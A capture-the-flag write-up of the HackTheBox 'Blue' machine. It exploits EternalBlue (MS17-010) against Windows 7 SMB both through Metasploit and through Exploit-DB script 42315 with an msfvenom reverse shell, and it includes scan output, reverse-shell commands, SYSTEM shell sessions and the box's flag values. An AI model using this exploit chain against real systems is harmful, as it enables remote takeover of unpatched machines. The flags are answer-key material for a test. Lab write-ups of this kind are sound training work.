TL;DR
This is a writeup of Blue, an easy-rated Windows box on HackTheBox. The box is compromised entirely through the EternalBlue (MS17-010) SMBv1 vulnerability; the exploit hands over a SYSTEM shell directly, so no separate privilege escalation step is needed to read the root flag.
Walkthrough
This writeup covers exploitation both with and without Metasploit.
Blue Writeup: Scanning Network
Let's start with the usual initial nmap scan.
Nmap 7.91 scan initiated as: nmap -sC -sV -n -v -A -oN nmap.initial 10.129.73.158
Increasing send delay for 10.129.73.158 from 0 to 5 due to 195 out of 648 dropped probes since last increase.
Nmap scan report for 10.129.73.158
Host is up (0.17s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Uptime guess: 0.006 days (since Wed Jun 2 11:34:09 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| clock-skew: mean: -19m57s, deviation: 34m37s, median: 1s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC | NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
| System time: 2021-06-02T16:42:28+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-02T15:42:31
|_ start_date: 2021-06-02T15:34:23
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 168.18 ms 10.10.14.1
2 168.38 ms 10.129.73.158
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
There are plenty of open ports here, but the interesting ones are Microsoft RPC on port 135, the NetBIOS session service on port 139 and SMB (microsoft-ds) on port 445; the host also identifies itself as haris-PC.
The service banner on port 445 reports "Windows 7 Professional 7601 Service Pack 1", and with the box being named "Blue", EternalBlue (MS17-010) is the obvious candidate. Two other details from the smb-security-mode output are worth keeping in mind: SMB message signing is disabled, and the scan was able to use the guest account. Let's confirm the vulnerability by running nmap's SMB vulnerability scripts.
In simple terms, Server Message Block (SMB) is a client-server protocol used for sharing access to files, printers, named pipes and other resources on a network. On modern Windows it runs directly over TCP port 445, with NetBIOS-over-TCP on port 139 kept for compatibility.
Checking for SMB vulnerabilities using Nmap scripts
Nmap ships a family of smb-vuln-* NSE scripts that test a host for known SMB vulnerabilities (list them with ls /usr/share/nmap/scripts/smb-vuln*); the set includes smb-vuln-ms17-010.
Let's run the whole family against ports 139 and 445. Note that the target address differs from the first scan; the box was respawned between sessions.
┌─[root@kali]─[~/Desktop/Blue HTB]
└──╼ nmap --script smb-vuln* -sV -v -p 139,445 10.129.156.45
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.129.156.45
Host is up (0.19s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 24.22 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Great! The box is vulnerable to EternalBlue (MS17-010) as expected; CVE-2017-0143, which nmap reports, is one of the SMBv1 CVEs covered by that bulletin. Let's move on to exploitation using Metasploit.
Blue Writeup: Exploitation (with Metasploit)
Fire up the Metasploit framework and use the MS17-010 EternalBlue module against the target.
Note that LHOST must be set to your HackTheBox VPN (tun0) address, otherwise the reverse handler is not reachable from the box; the first exploit attempt below fails for exactly that reason.
msf5 > search ms17-010
Matching Modules
# Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use 2
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.156.45
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] 10.129.156.45:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.53
LHOST => 10.10.14.53
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.14.53:4444
[*] 10.129.156.45:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.156.45:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.156.45:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.129.156.45:445 - Connecting to target for exploitation.
[+] 10.129.156.45:445 - Connection established for exploitation.
[+] 10.129.156.45:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.156.45:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.156.45:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.156.45:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.156.45:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.129.156.45:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.156.45:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.156.45:445 - Sending all but last fragment of exploit packet
[*] 10.129.156.45:445 - Starting non-paged pool grooming
[+] 10.129.156.45:445 - Sending SMBv2 buffers
[+] 10.129.156.45:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.156.45:445 - Sending final SMBv2 buffers.
[*] 10.129.156.45:445 - Sending last fragment of exploit packet!
[*] 10.129.156.45:445 - Receiving response from exploit packet
[+] 10.129.156.45:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.156.45:445 - Sending egg to corrupted connection.
[*] 10.129.156.45:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.129.156.45
[*] Meterpreter session 1 opened (10.10.14.53:4444 -> 10.129.156.45:49158) at 2021-06-03 09:46:36 -0400
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.156.45:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > sysinfo
Computer : HARIS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2904 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Users> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  17,254,989,824 bytes free
That was easy: the exploit lands us as NT AUTHORITY\SYSTEM straight away, so there is no privilege escalation step on this box.
Blue Writeup: Exploitation (without Metasploit)
First, find the public MS17-010 exploit with searchsploit; the relevant Exploit-DB entry is 42315. That script imports a helper, mysmb.py, which is linked from the same Exploit-DB entry and must be placed alongside it.
Let's copy the exploit into the current directory. Instead of copying it by hand, searchsploit can mirror it for you: pass the exploit ID together with the -m/--mirror flag and it drops a copy into the current directory.
After reading through the exploit code, two changes are needed before it will work against this box:
- Enumeration showed that the guest account is accepted (nmap's smb-security-mode reported account_used: guest), so set USERNAME to 'guest' in the exploit and leave the password empty.
- Generate a reverse shell executable with msfvenom and set the path to it in the exploit, so that once the SMB server has been corrupted the script uploads and runs that payload instead of its default demonstration action.
Now open a netcat listener on port 4444, the port the payload was built to call back to,
and run the MS17-010 Python exploit against the target.
┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ python 42315.py 10.129.159.0
Getting a reverse shell.
┌─[root@kali]─[~/Desktop/BlueHTB]
└──╼ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
We are NT AUTHORITY\SYSTEM again, this time without Metasploit. Let's retrieve the flags.
Blue Writeup: User Flag
C:\Users> cd haris\Desktop
C:\Users\haris\Desktop> type user.txt
4c546aea7dbee75cbd71de245c8deea9
Blue Writeup: Root Flag
C:\Users> cd Administrator\Desktop\
C:\Users\Administrator\Desktop> type root.txt
ff548eb71e920ff6c08843ce9df4e717
Until next time, do check out our other writeups here.